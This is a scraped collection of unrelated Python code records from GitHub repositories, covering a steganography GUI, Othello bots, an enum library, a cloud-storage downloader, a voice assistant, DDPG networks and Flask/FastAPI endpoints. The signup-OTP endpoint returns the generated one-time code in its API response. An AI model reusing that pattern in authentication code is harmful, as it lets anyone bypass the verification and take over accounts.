\"tmp/video.mov\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n progress['value'] = 60\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/video.mov\", \"-i\", \"tmp/audio.mp3\", \"-codec\", \"copy\", \"video.mp4\", \"-y\"],\n stdout=open(os.devnull, \"w\"), stderr=STDOUT)\n progress['value'] = 70\n root.update_idletasks()\n # desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n # shutil.copy(\"video.mp4\", desktop)\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n progress['value'] = 80\n root.update_idletasks()\n shutil.copy(\"video.mp4\", desktop)\n print(\"|Info| Done....\")\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\ndef decrypt_message():\n decode_string(video_path)\n\n\ndef clean_ui():\n print('[info] cleaning ui:')\n e1.delete('0', \"end\")\n e2.delete('0', \"end\")\n e3.delete('0', \"end\")\n e4.delete('0', \"end\")\n c_box.set('select')\n global video_path\n video_path = ''\n global img_path\n img_path = ''\n\n\ndef go_button():\n print(\"go_button invoke\")\n print('[info] checkbox1', c_box.get())\n print('[info] video name:', video_path)\n print('[info] msg:', e2.get())\n print('[info] image name:', img_path)\n if e1.get() == '':\n messagebox.showerror(\"Error\", \"Video is not selected\")\n if c_box.get() == 'Encrypt_Message':\n if e2.get() == '':\n messagebox.showwarning(\"Warning\", \"put some message in message box.\")\n else:\n encrypt_message()\n elif c_box.get() == 'Decrypt_Message':\n decrypt_message()\n elif c_box.get() == 'Encrypt_Image':\n if e3.get() == '':\n messagebox.showwarning(\"Warning\", \"select an image first.\")\n else:\n encode_image_into_video()\n elif c_box.get() == 'Decrypt_Image':\n decode_image_form_video()\n else:\n print(\"select an operation\")\n messagebox.showwarning(\"Warning\", \"select an operation first\")\n\n\ndef show_image():\n print(\"show image invoke:\")\n if img_path == '':\n print(\"file not found\")\n else:\n Image.open(img_path).show()\n\n\n# creating entries and positioning them on the grid\ne1 = Entry(root)\ne1.grid(row=10, column=2)\ne2 = Entry(root)\ne2.grid(row=11, column=2)\ne3 = Entry(root)\ne3.grid(row=14, column=2)\ne4 = Entry(root) #for key Default:python\ne4.insert(0,'python')\ne4.grid(row=13, column=2)\n# creating labels and positioning them on the grid\nlabel_1 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Video path')\nlabel_1.grid(row=10, column=1)\nlabel_2 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Plain text')\nlabel_2.grid(row=11, column=1)\nlabel_2 = Label(root, bg=\"dark slate gray\", fg=\"white\", text='Key')\nlabel_2.grid(row=13, column=1)\nlabel_3 = Label(root, bg=\"dark slate gray\", fg=\"white\", text=\"Operation :\").grid(column=1, row=12, padx=10, pady=10)\nlabel_4 = Label(root, bg=\"dark slate gray\", fg=\"white\", text=\"Image path\").grid(column=1, row=14, padx=10, pady=10)\n\n# creating checkbox and positioning them on the grid\nc_box = ttk.Combobox(root)\nc_box['values'] = ('Encrypt_Message', 'Decrypt_Message', 'Encrypt_Image', 'Decrypt_Image')\nc_box.grid(row=12, column=2, )\nc_box.set('select')\n\n# creating Buttons and positioning them on the grid\nb1 = Button(root, text='Browse', bg=\"teal\", fg=\"white\", command=lambda: open_file())\nb1.grid(row=10, column=3, padx=10, pady=10)\nb2 = Button(root, text=\"play video\", bg=\"teal\", fg=\"white\", command=play_btn)\nb2.grid(row=13, column=3, padx=10, pady=10)\nb3 = Button(root, text=\"load\", bg=\"teal\", fg=\"white\", command=open_file_for_image)\nb3.grid(row=14, column=3, padx=10, pady=10)\nb4 = Button(root, text=\"Go\", bg=\"teal\", fg=\"white\", command=go_button)\nb4.grid(row=15, column=3, padx=10, pady=10)\nb3 = Button(root, text=\"clear\", bg=\"teal\", fg=\"white\", command=clean_ui)\nb3.grid(row=15, column=1, padx=10, pady=10)\nb5 = Button(root, text=\"View Image\", bg=\"teal\", fg=\"white\", command=show_image)\nb5.grid(row=15, column=2, padx=10, pady=10)\n\nroot.mainloop()\n","repo_name":"shadan1997/Video-Steganography-desktop-based-application-using-python-UI","sub_path":"vw.py","file_name":"vw.py","file_ext":"py","file_size_in_byte":13187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25082340915","text":"def merge_outbound_with_inbound(id_list, adj):\n output_list = []\n for outbound in id_list['out']:\n for inbound in id_list['in']:\n current_list = []\n last_sector_of_current_outbound = outbound[-1]\n first_sector_of_current_inbound = inbound[0]\n if first_sector_of_current_inbound in adj[last_sector_of_current_outbound]:\n for number_1 in outbound:\n current_list.append(number_1)\n for number_2 in inbound:\n current_list.append(number_2)\n output_list.append(current_list[:])\n return output_list\n","repo_name":"astro-tech/kiwicom-task","sub_path":"merge_return.py","file_name":"merge_return.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8765782929","text":"from unittest import result\nfrom fastapi.routing import APIRouter\nfrom routers.config import engine\nfrom routers import Response\nimport ast,json\nimport schemas\nfrom routers.services.mail import sendEmail\nfrom routers.services.sms import sendSMS\nfrom random import randint\n\nrouter=APIRouter(prefix='/signupOtp',tags=['signupOtp'])\n\n@router.post('')\ndef signupOtp(request:schemas.signupOtp):\n try:\n with engine.connect()as cur:\n OTP = randint(1000, 9999)\n result=cur.execute(f\"\"\"EXEC [dbo].[signupOtp] ?\"\"\",(request.username)) \n rows=result.fetchall()\n result.close()\n if rows[0][0]!=0:\n sample=json.loads(rows[0][2])\n for i in sample:\n if i[\"templateType\"]=='M' and rows[0][1]!=None:\n Message_str = i[\"messageBody\"].replace(\n '[customerName]',str(request.username)).replace('[OTP Number]',str(OTP))\n Data={\"subject\":i[\"subject\"],\"contact\":rows[0][1],\"mail_content\":Message_str}\n sendEmail(Data) \n # elif i[\"templateType\"]=='S' and rows[0][1]!=None:\n # sendSMS(\"smart-parking\",rows[0][1],i[\"messageBody\"],i[\"peid\"],i[\"tpid\"])\n return {\"statusCode\": 1, \"response\": \"OTP sent Successfully!\",'OTP':OTP} \n else:\n return {\"statusCode\":rows[0][0], \"response\": rows[0][1]} \n \n except Exception as e:\n print(\"Exception Error\",str(e))\n return {\"statusCode\":0,\"response\":\"Server Error\"}","repo_name":"chinnies350/smartparkingdev","sub_path":"routers/signupOtp.py","file_name":"signupOtp.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40726945139","text":"import copy\nimport random\nimport numpy as np\n\nimport osero\n\ncell = osero.cell\nvec = osero.vec\n\nblank = osero.blank\nblack = osero.black\nwhite = osero.white\n\nif osero.player_white[1] == \"cnw\" or osero.player_black[1] == \"cnw\":\n from tensorflow import keras\n import numpy as np\n if osero.player_white[1] == \"cnw\":\n model_white = keras.models.load_model(osero.player_white[2])\n if osero.player_black[1] == \"cnw\":\n model_black = keras.models.load_model(osero.player_black[2])\n\ndef cpu(board):\n max_deep = 3\n deep = 0\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.pop([i, j])\n x = put_able_list[0][0]\n y = put_able_list[0][1]\n for i in put_able_list:\n dfs = []\n\ndef cpu_weak(board_org, turn):\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n for li in put_able_list:\n board = copy.deepcopy(board_org)\n board_after = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n print(li, put_able_cnt)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n \n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_weak_forbid(board_org, turn):\n forbid_grid = [[0,1],[1,0],[1,1],[0,6],[1,6],[1,7],[6,0],[6,1],[7,1],[6,6],[6,7],[7,6]]\n\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n for li in put_able_list:\n board = copy.deepcopy(board_org)\n board = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n if li in forbid_grid:\n put_able_cnt += 10\n print(li, put_able_cnt)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_table(board_org, turn):\n board = copy.deepcopy(board_org)\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n put_able_cnt_min = 64\n table = np.load(\"black_table.npy\")\n alpha = 1\n for li in put_able_list:\n score = 0\n board = copy.deepcopy(board_org)\n board = osero.convert(li[0], li[1], turn, board)\n put_able_cnt, tmp = osero.put_able_check(turn * -1, board)\n score = alpha * table[li[0]][li[1]] - put_able_cnt\n print(li, score)\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\ndef cpu_deep(board_org, turn, deep_max = 5):\n def get_put_list(board, deep):\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j, deep, copy.deepcopy(board)])\n return put_able_list\n\n forbid_grid = [[0,1],[1,0],[1,1],[0,6],[1,6],[1,7],[6,0],[6,1],[7,1],[6,6],[6,7],[7,6]]\n\n board = copy.deepcopy(board_org)\n put_able_list = get_put_list(board, 0)\n put_able_cnt_min = 64\n for li in put_able_list:\n score = 0\n deep = 0\n board = copy.deepcopy(board_org)\n\n dfs = [[li[0], li[1], deep, board]]\n while dfs != []:\n tmp = dfs.pop(0)\n deep = tmp[2]\n if deep > deep_max:\n continue\n board = tmp[3]\n\n board = osero.convert(tmp[0], tmp[1], turn * (-1)**deep, board)\n deep += 1\n put_able_cnt, board = osero.put_able_check(turn * (-1)**deep, board)\n if turn * (-1)**deep == turn:\n score -= put_able_cnt\n else:\n score += put_able_cnt\n dfs = dfs + get_put_list(board, deep)\n if [tmp[0], tmp[1]] in forbid_grid:\n score += 10\n \n print(li[:2], put_able_cnt)\n if li[:2] in forbid_grid:\n score += 10\n if put_able_cnt_min > put_able_cnt:\n put_list = [li]\n put_able_cnt_min = put_able_cnt\n elif put_able_cnt_min == put_able_cnt:\n put_list.append(li)\n\n tmp = random.randint(0, len(put_list)-1)\n x = put_list[tmp][0]\n y = put_list[tmp][1]\n\n print(\"put\", x, y)\n return x, y\n\nclass cnw():\n def predict(board, turn):\n black_board = [[0 for _ in range(cell)]for _ in range(cell)]\n white_board = [[0 for _ in range(cell)]for _ in range(cell)]\n\n for i in range(cell):\n for j in range(cell):\n num = board[i][j]\n if num == white:\n white_board[i][j] = 1\n if num == black:\n black_board[i][j] = 1\n if turn == white:\n my_data = white_board\n enemy_data = black_board\n else :\n my_data = black_board\n enemy_data = white_board\n board_data = np.array([[my_data, enemy_data]], dtype=np.int8)\n\n if turn == white:\n pre = model_white.predict(board_data)\n else :\n pre = model_black.predict(board_data)\n num = np.argmax(pre)\n li = []\n for i in range(cell):\n for j in range(cell):\n li.append([i, j])\n x = li[num][0]\n y = li[num][1]\n print(\"put \",x, y, num)\n return x, y\n\n\ndef cpu_random(board):\n put_able_list = []\n for i in range(cell):\n for j in range(cell):\n if board[i][j] == 2:\n put_able_list.append([i, j])\n if len(put_able_list) == 0:\n return \n else:\n tmp = random.randint(0, len(put_able_list)-1)\n return put_able_list[tmp][0], put_able_list[tmp][1]\n\n\n","repo_name":"SokiGoto/osero","sub_path":"cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18314451722","text":"import textwrap\nfrom operator import attrgetter\nfrom warnings import warn\n\nfrom fusion_util.errors import InvalidEnumItem\n\n\n\nclass Enum(object):\n \"\"\"\n An enumeration.\n\n `Enum` objects implement the iterator protocol.\n\n :type _order: ``List[`EnumItem`]``\n :ivar _order: Enumeration items in the original order of the definition.\n\n :type _values: ``Mapping[object, `EnumItem`]``\n :ivar _values: A mapping of enumeration values to `EnumItem`s\n \"\"\"\n def __init__(self, doc, values, value_key=attrgetter('value')):\n \"\"\"\n :param str doc: Brief documentation of the enumeration.\n :type values: ``List[`EnumItem`]``\n :param values: List of enumeration items.\n :type value_key: ``Callable[[`EnumItem`], unicode]``\n :param value_key: Function to produce the key to use when constructing\n a mapping for each item in ``values``.\n \"\"\"\n self.doc = doc\n _order = self._order = []\n _values = self._values = {}\n for value in values:\n key = value_key(value)\n if key in _values:\n raise ValueError(\n '{!r} is already a value in the enumeration'.format(key))\n _order.append(value)\n _values[key] = value\n\n\n def __iter__(self):\n for item in self._order:\n if not item.hidden:\n yield item\n\n\n def __repr__(self):\n lines = textwrap.wrap(textwrap.dedent(self.doc.strip()))\n line = 'undocumented'\n if lines:\n line = lines[0]\n if len(lines) > 1:\n line += '...'\n line = '\"\"\"{}\"\"\"'.format(line)\n return '<{} {}>'.format(\n type(self).__name__,\n line)\n\n\n def __eq__(self, other):\n if isinstance(other, Enum):\n return (other.doc == self.doc and\n self._order == other._order)\n return NotImplemented\n\n\n @classmethod\n def from_pairs(cls, doc, pairs):\n \"\"\"\n Construct an enumeration from an iterable of pairs.\n\n :param doc: See `Enum.__init__`.\n :type pairs: ``Iterable[Tuple[unicode, unicode]]``\n :param pairs: Iterable to construct the enumeration from.\n :rtype: Enum\n \"\"\"\n values = (EnumItem(value, desc) for value, desc in pairs)\n return cls(doc=doc, values=values)\n\n\n @classmethod\n def fromPairs(cls, doc, pairs):\n warn('Enum.fromPairs is deprecated, use Enum.from_pairs',\n DeprecationWarning, 2)\n return cls.from_pairs(doc, pairs)\n\n\n def get(self, value):\n \"\"\"\n Get an enumeration item for an enumeration value.\n\n :param unicode value: Enumeration value.\n :raise InvalidEnumItem: If ``value`` does not match any known\n enumeration value.\n :rtype: EnumItem\n \"\"\"\n _nothing = object()\n item = self._values.get(value, _nothing)\n if item is _nothing:\n raise InvalidEnumItem(value)\n return item\n\n\n def desc(self, value):\n \"\"\"\n Get the enumeration item description for an enumeration value.\n\n :param unicode value: Enumeration value.\n \"\"\"\n try:\n return self.get(value).desc\n except InvalidEnumItem:\n return u''\n\n\n def getDesc(self, value):\n warn('Enum.getDesc is deprecated, use Enum.desc',\n DeprecationWarning, 2)\n return self.desc(value)\n\n\n def extra(self, value, extra_name, default=None):\n \"\"\"\n Get the additional enumeration value for ``extra_name``.\n\n :param unicode value: Enumeration value.\n :param str extra_name: Extra name.\n :param default: Default value in the case ``extra_name`` doesn't exist.\n \"\"\"\n try:\n return self.get(value).get(extra_name, default)\n except InvalidEnumItem:\n return default\n\n\n def getExtra(self, value, extraName, default=None):\n warn('Enum.getExtra is deprecated, use Enum.extra',\n DeprecationWarning, 2)\n return self.extra(value, extraName, default)\n\n\n def find(self, **names):\n \"\"\"\n Find the first item with matching extra values.\n\n :param \\*\\*names: Extra values to match.\n :rtype: `EnumItem`\n :return: First matching item or ``None``.\n \"\"\"\n for res in self.find_all(**names):\n return res\n return None\n\n\n def find_all(self, **names):\n \"\"\"\n Find all items with matching extra values.\n\n :param \\*\\*names: Extra values to match.\n :rtype: ``Iterable[`EnumItem`]``\n \"\"\"\n values = names.items()\n if len(values) != 1:\n raise ValueError('Only one query is allowed at a time')\n name, value = values[0]\n for item in self:\n if item.get(name) == value:\n yield item\n\n\n def findAll(self, **names):\n warn('Enum.findAll is deprecated, use Enum.find_all',\n DeprecationWarning, 2)\n return self.find_all(**names)\n\n\n def as_pairs(self):\n \"\"\"\n Transform the enumeration into a sequence of pairs.\n\n :rtype: ``List[Tuple[unicode, unicode]]``\n :return: List of enumeration value and description pairs.\n \"\"\"\n return [(i.value, i.desc) for i in self]\n\n\n def asPairs(self):\n warn('Enum.asPairs is deprecated, use Enum.as_pairs',\n DeprecationWarning, 2)\n return self.as_pairs()\n\n\n\nclass ObjectEnum(Enum):\n \"\"\"\n An enumeration for arbitrary Python objects.\n\n Pass the Python object as the `value` parameter to `EnumItem`, `ObjectEnum`\n will automatically create an ``id`` extra value for `EnumItem`\\s that do\n not already have such a value.\n \"\"\"\n def __init__(self, doc, values):\n def value_key(value):\n key = unicode(id(value.value))\n if value.get('id') is None:\n value._extra['id'] = key\n return key\n super(ObjectEnum, self).__init__(\n doc=doc, values=values, value_key=value_key)\n\n\n def get(self, value):\n value = unicode(id(value))\n return super(ObjectEnum, self).get(value)\n\n\n def as_pairs(self):\n return [(i.id, i.desc)\n for i in self]\n\n\n\nclass EnumItem(object):\n \"\"\"\n An enumeration item contained by `Enum`.\n\n :ivar value: Enumeration value.\n :ivar unicode desc: Brief textual description of the enumeration item.\n :ivar bool hidden: Is this enumeration item hidden?\n :type _extra: ``Mapping[str, object]``\n :ivar _extra: Mapping of names to additional enumeration values.\n \"\"\"\n def __init__(self, value, desc, hidden=False, **extra):\n \"\"\"\n Initialise an enumeration item.\n\n :param value: See `EnumItem.value`.\n :param desc: See `EnumItem.desc`.\n :param hidden: See `EnumItem.hidden`.\n :param \\*\\*extra: Additional extra values, accessed via `EnumItem.get`.\n \"\"\"\n self.value = value\n self.desc = desc\n self.hidden = hidden\n self._extra = extra\n\n\n def __repr__(self):\n return '<{} value={!r} desc={!r} hidden={}>'.format(\n type(self).__name__,\n self.value,\n self.desc,\n self.hidden)\n\n\n def __eq__(self, other):\n if isinstance(other, EnumItem):\n return (self.value == other.value and\n self.desc == other.desc and\n self.hidden == other.hidden and\n self._extra == other._extra)\n return NotImplemented\n\n\n def __getattr__(self, name):\n \"\"\"\n Get an extra value by name.\n \"\"\"\n warn('Attribute access on EnumItem is deprecated, use EnumItem.get',\n DeprecationWarning, 2)\n if name in self._extra:\n return self.get(name)\n raise AttributeError(\n '{!r} object has no attribute {!r}'.format(\n type(self).__name__, name))\n\n\n def get(self, name, default=None):\n \"\"\"\n Get the value of an extra parameter.\n\n :param str name: Extra parameter name.\n :param default: Default value in the case ``name`` doesn't exist.\n \"\"\"\n return self._extra.get(name, default)\n\n\n def items(self):\n \"\"\"\n Additional enumeration values.\n\n :rtype: ``Iterable[Tuple[str, object]]``\n \"\"\"\n return self._extra.items()\n\n\n\ndef filter_enum(pred, enum):\n \"\"\"\n Create a new enumeration containing only items filtered from another\n enumeration.\n\n Hidden enum items in the original enumeration are excluded.\n\n :type pred: ``Callable[[`EnumItem`], bool]``\n :param pred: Predicate that will keep items for which the result is true.\n :type enum: Enum\n :param enum: Enumeration to filter.\n :rtype: Enum\n :return: New filtered enumeration.\n \"\"\"\n def _items():\n for item in enum:\n yield EnumItem(\n item.value,\n item.desc,\n not pred(item),\n **item._extra)\n return Enum('Filtered from {!r}'.format(enum), list(_items()))\n","repo_name":"fusionapp/fusion-util","sub_path":"fusion_util/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39481733537","text":"from google.cloud import storage\nfrom itertools import repeat\nimport concurrent.futures\nimport time\n\n\ndef list_blobs_with_prefix(bucket_name: str,\n prefix: str, \n delimiter: str = None):\n storage_client = storage.Client()\n blobs = storage_client.list_blobs(bucket_name, prefix=prefix, delimiter=delimiter)\n\n return [blob.name for blob in blobs]\n\ndef download_blob(bucket_name: str, \n source_blob_name: str, \n destination_file_name: str):\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n return (\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n source_blob_name, bucket_name, destination_file_name\n )\n )\n\n\n# Information needed to download the objects\nbucket_name = 'renatoleite-criteo-partial'\nprefix = ''\ndelimiter = None\nblobs = list_blobs_with_prefix(bucket_name, prefix, delimiter)\n\n# Destination folder\ndest_folder = '/home/renatoleite/data/'\ndest_files = [dest_folder + blob.split(sep='/')[-1] for blob in blobs]\n\nstart_time = time.perf_counter()\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n executor.map(download_blob, \n repeat(bucket_name), \n blobs, \n dest_files)\n\nend_time = time.perf_counter()\n\nprint(f'Finished in {end_time-start_time} seconds.')","repo_name":"js-ts/rl-merlin","sub_path":"benchmark_vertex_copy_gcs/gcs_api_copy.py","file_name":"gcs_api_copy.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31757836852","text":"import statistics\n\ndef p1(s: str):\n nums = [int(n) for n in s.replace(\"\\n\", \"\").split(\",\")]\n alignment = statistics.median(nums)\n return sum([abs(i - alignment) for i in nums])\n\n\ndef p2(s: str):\n nums = [int(n) for n in s.replace(\"\\n\", \"\").split(\",\")]\n alignment = int(statistics.mean(nums))\n return min(\n sum(abs(i - a) * (abs(i - a) + 1) / 2 for i in nums)\n for a in [alignment, alignment + 1]\n )\n \ninput = \"16,1,2,0,4,2,7,1,2,14\"\nprint(p1(input))\nprint(p2(input))","repo_name":"EliasMera/AdventOfCode2021","sub_path":"Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6024089106","text":"import pyttsx3\nimport wikipedia\n\n\ndef search_wikipedia():\n try:\n voice = pyttsx3.init()\n search_query = input(\"Searching wikipedia/google: \")\n result = wikipedia.summary(search_query)\n print(result)\n voice.say(result)\n voice.runAndWait()\n except wikipedia.exceptions.DisambiguationError as e:\n print(\"Please provide a more specific search query.\")\n except wikipedia.exceptions.PageError as e:\n print(\"The page you requested does not exist.\")\n except Exception as e:\n print(\"An error occurred while searching Wikipedia.\")\n\n\nsearch_wikipedia()\n","repo_name":"ashalupreti/Wikipedia-Voice-Assistant","sub_path":"Wikipedia Voice Assistant.py","file_name":"Wikipedia Voice Assistant.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72773614188","text":"import torch\nimport torch.nn as nn\n\nclass Actor(nn.Module):\n def __init__(self, n_states):\n super(Actor, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_states, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 1)\n )\n \n def forward(self, state):\n return self.net(state)\n\nclass Critic(nn.Module):\n def __init__(self, n_states, n_actions):\n super(Critic, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_states + n_actions, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, 20), \n nn.ReLU(), \n nn.Linear(20, n_actions)\n )\n \n def forward(self, state, action):\n return self.net(torch.cat((state, action), 1))","repo_name":"greatwallet/mountain-car","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"36770659920","text":"from flask import Flask, request, session\nfrom flask_restx import Resource, Api, fields, Namespace\nfrom model.ConnecsiModel import ConnecsiModel\nfrom passlib.hash import sha256_crypt\nimport datetime\nfrom controller.youtube.YoutubeApiController import YoutubeApiController\nimport requests\n\nns_youtube = Namespace('Youtube', description='Youtube Apis')\n\nsearch_channels_form = ns_youtube.model('Search Channels', {\n 'category_id' : fields.String(required=False, description='Category ID'),\n 'country' : fields.String(required=False, description='Country'),\n 'min_lower' : fields.Integer(required=False, description='Min Followers'),\n 'max_upper' : fields.Integer(required=False, description='Max Followers'),\n 'sort_order' : fields.String(required=False, description='Sort Order'),\n 'offset' : fields.Integer(required=True, description='Offset')\n})\n\n\n@ns_youtube.route('/regionCodes')\nclass RegionCodes(Resource):\n def get(self):\n '''get all youtube region codes'''\n connecsiObj = ConnecsiModel()\n region_codes = connecsiObj.get__(table_name='youtube_region_codes', STAR='*')\n columns = ['region_code', 'country_name']\n response_list = []\n for item in region_codes:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n return {'data' : response_list}\n\n@ns_youtube.route('/regionCode/')\nclass RegionCode(Resource):\n def get(self,regionCode):\n '''get country name by region code'''\n connecsiObj = ConnecsiModel()\n data = connecsiObj.get__(table_name='youtube_region_codes',STAR='*',WHERE='WHERE',compare_column='regionCode',compare_value=str(regionCode))\n return {'data' : data}\n\n@ns_youtube.route('/videoCategories')\nclass VideoCategories(Resource):\n def get(self):\n ''' get all video categories'''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get__(table_name='youtube_video_categories', STAR='*')\n print(video_categories)\n columns = ['video_cat_id','video_cat_name']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n@ns_youtube.route('/videoCategories/')\nclass VideoCategories(Resource):\n def get(self,video_cat_id):\n ''' get video categories by video cat id '''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get__(table_name='youtube_video_categories', STAR='*',WHERE='WHERE',compare_column='video_cat_id',compare_value=video_cat_id)\n print(video_categories)\n columns = ['video_cat_id','video_cat_name']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/searchChannels/')\nclass SearchChannels(Resource):\n @ns_youtube.expect(search_channels_form)\n def post(self,channel):\n '''search channels'''\n try:\n form_data = request.get_json()\n category_id = form_data.get('category_id')\n country = form_data.get('country')\n min_lower = form_data.get('min_lower')\n max_upper = form_data.get('max_upper')\n sort_order = form_data.get('sort_order')\n offset = form_data.get('offset')\n connecsiObj=ConnecsiModel()\n if channel == 'youtube' or channel == 'Youtube':\n print('i m inside if')\n total_rows = connecsiObj.search_youtube_inf_get_total_rows(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n\n # print('my data = ',total_rows)\n print(total_no_of_rows)\n data = connecsiObj.search_youtube_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n ,category_id=str(category_id), country=str(country), sort_order=sort_order,offset=str(offset))\n columns = ['channel_id', 'title','channel_img','desc','subscriberCount_gained','subscriberCount_lost','business_email','total_100video_views',\n 'total_100video_views_unique','total_100video_likes','total_100video_dislikes','total_100video_comments','total_100video_shares',\n 'facebook_url','insta_url','twitter_url','country']\n response_list = []\n\n # print(type(data))\n # print(data)\n for item in data:\n # print(item)\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows':total_no_of_rows})\n response_list.append(dict_temp)\n # print(response_list)\n return {'data':response_list}\n\n elif channel == 'twitter' or channel == 'Twitter':\n total_rows = connecsiObj.search_twitter_inf_get_total_rows(min_lower=str(min_lower),\n max_upper=str(max_upper)\n , category_id=str(category_id),\n country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n data = connecsiObj.search_twitter_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country),\n sort_order=sort_order, offset=str(offset))\n columns = ['channel_id','screen_name','title', 'channel_img', 'desc', 'subscriberCount_gained',\n 'business_email', 'total_100video_views',\n 'total_100video_likes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url','youtube_url', 'twitter_url', 'country']\n response_list = []\n for item in data:\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows': total_no_of_rows})\n response_list.append(dict_temp)\n # print(response_list)\n return {'data': response_list}\n\n elif channel == 'instagram' or channel == 'Instagram':\n total_rows = connecsiObj.search_instagram_inf_get_total_rows(min_lower=str(min_lower),\n max_upper=str(max_upper)\n , category_id=str(category_id),\n country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n print('total rows insta = ',total_no_of_rows)\n data = connecsiObj.search_instagram_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country),\n sort_order=sort_order, offset=str(offset))\n print(data)\n columns = ['channel_id','username','title', 'channel_img', 'desc', 'subscriberCount_gained',\n 'business_email', 'total_100video_views',\n 'total_100video_likes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url','youtube_url', 'twitter_url', 'country','total_videos']\n response_list = []\n for item in data:\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows': total_no_of_rows})\n response_list.append(dict_temp)\n print(response_list)\n return {'data': response_list}\n except Exception as e:\n print('i m in exception ')\n print(e)\n return {'response' : e}\n\n\n@ns_youtube.route('/top10Influencers')\nclass Youtube(Resource):\n def get(self):\n '''get top 10 youtube influencers based on number of subscribers desc'''\n connecsiObj = ConnecsiModel()\n youtube_inf = connecsiObj.getTop10YoutubeInfluencers()\n columns = ['channel_id', 'title', 'channel_img','subscriberCount_gained','total_100video_views','total_100video_likes',\n 